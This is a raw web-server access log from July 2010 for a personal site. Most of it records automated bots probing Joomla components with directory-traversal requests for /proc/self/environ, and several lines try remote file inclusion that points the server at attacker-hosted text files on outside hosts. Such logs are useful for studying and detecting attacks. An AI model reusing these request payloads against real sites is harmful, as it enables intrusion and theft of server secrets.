86.109.96.188 - - [29/Jul/2010:10:27:07 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "sonyafatah.com"
86.109.96.188 - - [29/Jul/2010:10:27:08 -0700] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "sonyafatah.com"
86.109.96.188 - - [29/Jul/2010:10:27:15 -0700] "GET /logs/access_100705.log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "sonyafatah.com"
86.109.96.188 - - [29/Jul/2010:10:27:33 -0700] "GET /logs/access_100702.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "sonyafatah.com"
217.16.18.219 - - [29/Jul/2010:10:27:47 -0700] "GET /logs/access_100711.log//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
217.16.18.219 - - [29/Jul/2010:10:27:48 -0700] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
217.16.18.219 - - [29/Jul/2010:10:27:48 -0700] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
125.141.91.138 - - [29/Jul/2010:10:27:50 -0700] "GET /logs/access_100721.log//index.php?option=com_realtyna&controller=http://jy-lib.or.kr/bbs//skin/zero_vote/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
125.141.91.138 - - [29/Jul/2010:10:27:50 -0700] "GET /index.php?option=com_realtyna&controller=http://jy-lib.or.kr/bbs//skin/zero_vote/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
125.141.91.138 - - [29/Jul/2010:10:27:51 -0700] "GET /logs//index.php?option=com_realtyna&controller=http://jy-lib.or.kr/bbs//skin/zero_vote/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
217.16.18.219 - - [29/Jul/2010:10:27:51 -0700] "GET /logs/access_100711.log//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
217.16.18.219 - - [29/Jul/2010:10:27:52 -0700] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
217.16.18.219 - - [29/Jul/2010:10:27:52 -0700] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
217.16.18.219 - - [29/Jul/2010:10:28:07 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
217.16.18.219 - - [29/Jul/2010:10:28:11 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
86.109.96.188 - - [29/Jul/2010:10:28:46 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "sonyafatah.com"
114.108.176.9 - - [29/Jul/2010:10:29:15 -0700] "GET /index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "sonyafatah.com"
86.109.96.188 - - [29/Jul/2010:10:29:21 -0700] "GET /logs/access_100717.log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "sonyafatah.com"
217.16.18.219 - - [29/Jul/2010:10:29:35 -0700] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
217.16.18.219 - - [29/Jul/2010:10:29:44 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
217.16.18.219 - - [29/Jul/2010:10:29:45 -0700] "GET /logs/access_100715.log//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
217.16.18.219 - - [29/Jul/2010:10:29:46 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
217.16.18.219 - - [29/Jul/2010:10:29:59 -0700] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
217.16.18.219 - - [29/Jul/2010:10:30:00 -0700] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
217.16.18.219 - - [29/Jul/2010:10:30:05 -0700] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
217.16.18.219 - - [29/Jul/2010:10:30:06 -0700] "GET /logs/access_100713.log//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
217.16.18.219 - - [29/Jul/2010:10:30:06 -0700] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
217.16.18.219 - - [29/Jul/2010:10:30:06 -0700] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
217.16.18.219 - - [29/Jul/2010:10:30:07 -0700] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
217.16.18.219 - - [29/Jul/2010:10:30:08 -0700] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
217.16.18.219 - - [29/Jul/2010:10:30:10 -0700] "GET /logs/access_100715.log//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
217.16.18.219 - - [29/Jul/2010:10:30:32 -0700] "GET /logs/access_100711.log//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
217.16.18.219 - - [29/Jul/2010:10:30:32 -0700] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
217.16.18.219 - - [29/Jul/2010:10:30:32 -0700] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
217.16.18.219 - - [29/Jul/2010:10:30:35 -0700] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
217.16.18.219 - - [29/Jul/2010:10:30:36 -0700] "GET /logs/access_100711.log//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
217.16.18.219 - - [29/Jul/2010:10:30:37 -0700] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
125.141.91.138 - - [29/Jul/2010:10:30:37 -0700] "GET /index.php?option=com_realtyna&controller=http://jy-lib.or.kr/bbs//skin/zero_vote/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
217.16.18.219 - - [29/Jul/2010:10:30:37 -0700] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
217.16.18.219 - - [29/Jul/2010:10:30:43 -0700] "GET /logs/access_100713.log//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
217.16.18.219 - - [29/Jul/2010:10:30:43 -0700] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
217.16.18.219 - - [29/Jul/2010:10:30:43 -0700] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
217.16.18.219 - - [29/Jul/2010:10:30:50 -0700] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
217.16.18.219 - - [29/Jul/2010:10:31:06 -0700] "GET /logs/access_100711.log//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
66.7.206.104 - - [29/Jul/2010:10:31:06 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
66.7.206.104 - - [29/Jul/2010:10:31:06 -0700] "POST /logs/access_100711.log%20%20/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
66.7.206.104 - - [29/Jul/2010:10:31:06 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
217.16.18.219 - - [29/Jul/2010:10:31:06 -0700] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
217.16.18.219 - - [29/Jul/2010:10:31:06 -0700] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
125.141.91.138 - - [29/Jul/2010:10:31:11 -0700] "GET /logs/access_100628.log//index.php?option=com_realtyna&controller=http://jy-lib.or.kr/bbs//skin/zero_vote/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
217.16.18.219 - - [29/Jul/2010:10:31:49 -0700] "GET /logs/access_100711.log//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
217.16.18.219 - - [29/Jul/2010:10:31:53 -0700] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
217.16.18.219 - - [29/Jul/2010:10:31:53 -0700] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
217.16.18.219 - - [29/Jul/2010:10:32:10 -0700] "GET /logs/access_100711.log//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
114.108.176.9 - - [29/Jul/2010:10:32:10 -0700] "GET /logs/access_100721.log//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "sonyafatah.com"
114.108.176.9 - - [29/Jul/2010:10:32:11 -0700] "GET /index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "sonyafatah.com"
114.108.176.9 - - [29/Jul/2010:10:32:11 -0700] "GET /logs//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "sonyafatah.com"
217.16.18.219 - - [29/Jul/2010:10:32:40 -0700] "GET /logs/access_100711.log//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
217.16.18.219 - - [29/Jul/2010:10:32:47 -0700] "GET /logs/access_100713.log//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
217.16.18.219 - - [29/Jul/2010:10:33:01 -0700] "GET /logs/access_100713.log//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
91.64.151.21 - - [29/Jul/2010:10:33:31 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "sonyafatah.com"
91.64.151.21 - - [29/Jul/2010:10:34:49 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "sonyafatah.com"
74.82.57.166 - - [29/Jul/2010:10:35:34 -0700] "GET /myMailer.class.php?mosConfig_absolute_path=http://www.fileden.com/files/2010/7/14/2914741/echo.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "sonyafatah.com"
74.82.57.166 - - [29/Jul/2010:10:35:34 -0700] "GET /logs/myMailer.class.php?mosConfig_absolute_path=http://www.fileden.com/files/2010/7/14/2914741/echo.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "sonyafatah.com"
74.82.57.166 - - [29/Jul/2010:10:35:35 -0700] "GET /logs/access_100627.log/myMailer.class.php?mosConfig_absolute_path=http://www.fileden.com/files/2010/7/14/2914741/echo.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "sonyafatah.com"
67.195.115.242 - - [29/Jul/2010:10:36:18 -0700] "GET /tmp/?M=D HTTP/1.0" 200 2111 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "sonyafatah.com"
217.16.18.219 - - [29/Jul/2010:10:37:48 -0700] "GET /logs/access_100711.log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
217.16.18.219 - - [29/Jul/2010:10:37:49 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
217.16.18.219 - - [29/Jul/2010:10:37:49 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
217.16.18.219 - - [29/Jul/2010:10:37:52 -0700] "GET /logs/access_100711.log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
217.16.18.219 - - [29/Jul/2010:10:37:52 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
217.16.18.219 - - [29/Jul/2010:10:37:53 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
114.108.176.9 - - [29/Jul/2010:10:38:06 -0700] "GET /logs/access_100720.log//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "sonyafatah.com"
67.28.112.47 - - [29/Jul/2010:10:38:47 -0700] "POST /wp-cron.php?doing_wp_cron HTTP/1.0" 404 - "-" "WordPress/2.8.5; http://sonyafatah.com/blog" "sonyafatah.com"
67.195.115.242 - - [29/Jul/2010:10:38:47 -0700] "GET /blog/index.php/2007/06/19/pakistani-police-build-case-against-former-cabinet-minister HTTP/1.0" 200 11079 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "sonyafatah.com"
217.16.18.219 - - [29/Jul/2010:10:39:48 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
217.16.18.219 - - [29/Jul/2010:10:39:48 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
86.109.96.188 - - [29/Jul/2010:10:40:49 -0700] "GET /logs/access_100628.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "sonyafatah.com"
86.109.96.188 - - [29/Jul/2010:10:40:50 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "sonyafatah.com"
86.109.96.188 - - [29/Jul/2010:10:40:50 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "sonyafatah.com"
86.109.96.188 - - [29/Jul/2010:10:40:58 -0700] "GET /logs/access_100719.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "sonyafatah.com"
189.21.153.139 - - [29/Jul/2010:10:41:40 -0700] "GET /logs/access_100628.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "sonyafatah.com"
189.21.153.139 - - [29/Jul/2010:10:41:41 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "sonyafatah.com"
189.21.153.139 - - [29/Jul/2010:10:41:41 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "sonyafatah.com"
217.16.18.219 - - [29/Jul/2010:10:41:56 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
189.21.153.139 - - [29/Jul/2010:10:41:59 -0700] "GET /logs/access_100719.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "sonyafatah.com"
217.16.18.219 - - [29/Jul/2010:10:42:07 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
67.192.58.33 - - [29/Jul/2010:10:42:29 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
67.192.58.33 - - [29/Jul/2010:10:42:29 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
67.192.58.33 - - [29/Jul/2010:10:42:29 -0700] "POST /logs/access_100716.log%20%20/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
67.192.58.33 - - [29/Jul/2010:10:42:41 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
67.192.58.33 - - [29/Jul/2010:10:42:41 -0700] "POST /logs/access_100716.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
67.192.58.33 - - [29/Jul/2010:10:42:41 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
217.16.18.219 - - [29/Jul/2010:10:43:05 -0700] "GET /logs/access_100719.log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
217.16.18.219 - - [29/Jul/2010:10:43:06 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
217.16.18.219 - - [29/Jul/2010:10:43:06 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
217.16.18.219 - - [29/Jul/2010:10:43:06 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
217.16.18.219 - - [29/Jul/2010:10:43:07 -0700] "GET /logs/access_100719.log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
217.16.18.219 - - [29/Jul/2010:10:43:07 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
217.16.18.219 - - [29/Jul/2010:10:43:07 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
217.16.18.219 - - [29/Jul/2010:10:43:33 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
217.16.18.219 - - [29/Jul/2010:10:44:04 -0700] "GET /logs/access_100718.log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
217.16.18.219 - - [29/Jul/2010:10:44:04 -0700] "GET /logs/access_100718.log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
217.16.18.219 - - [29/Jul/2010:10:44:09 -0700] "GET /logs/access_100718.log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
125.141.91.138 - - [29/Jul/2010:10:45:05 -0700] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://jy-lib.or.kr/bbs//skin/zero_vote/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
120.50.34.74 - - [29/Jul/2010:10:46:25 -0700] "POST /logs/access_100704.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
120.50.34.74 - - [29/Jul/2010:10:46:25 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
120.50.34.74 - - [29/Jul/2010:10:46:25 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
217.16.18.219 - - [29/Jul/2010:10:46:54 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
67.28.112.47 - - [29/Jul/2010:10:47:17 -0700] "POST /wp-cron.php?doing_wp_cron HTTP/1.0" 404 - "-" "WordPress/2.8.5; http://sonyafatah.com/blog" "sonyafatah.com"
217.16.18.219 - - [29/Jul/2010:10:47:25 -0700] "GET /logs/access_100718.log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
74.50.85.50 - - [29/Jul/2010:10:47:49 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "sonyafatah.com"
86.109.96.188 - - [29/Jul/2010:10:49:28 -0700] "GET /logs/access_100628.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "sonyafatah.com"
86.109.96.188 - - [29/Jul/2010:10:49:28 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "sonyafatah.com"
86.109.96.188 - - [29/Jul/2010:10:49:29 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "sonyafatah.com"
86.109.96.188 - - [29/Jul/2010:10:49:37 -0700] "GET /logs/access_100719.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "sonyafatah.com"
74.55.96.234 - - [29/Jul/2010:10:49:42 -0700] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://yuliana.zoomshare.com/files/2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
74.55.96.234 - - [29/Jul/2010:10:49:42 -0700] "GET /logs/access_100719.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://yuliana.zoomshare.com/files/2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
74.55.96.234 - - [29/Jul/2010:10:49:43 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://yuliana.zoomshare.com/files/2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
74.55.96.234 - - [29/Jul/2010:10:49:50 -0700] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://yuliana.zoomshare.com/files/2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
74.55.96.234 - - [29/Jul/2010:10:49:50 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://yuliana.zoomshare.com/files/2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
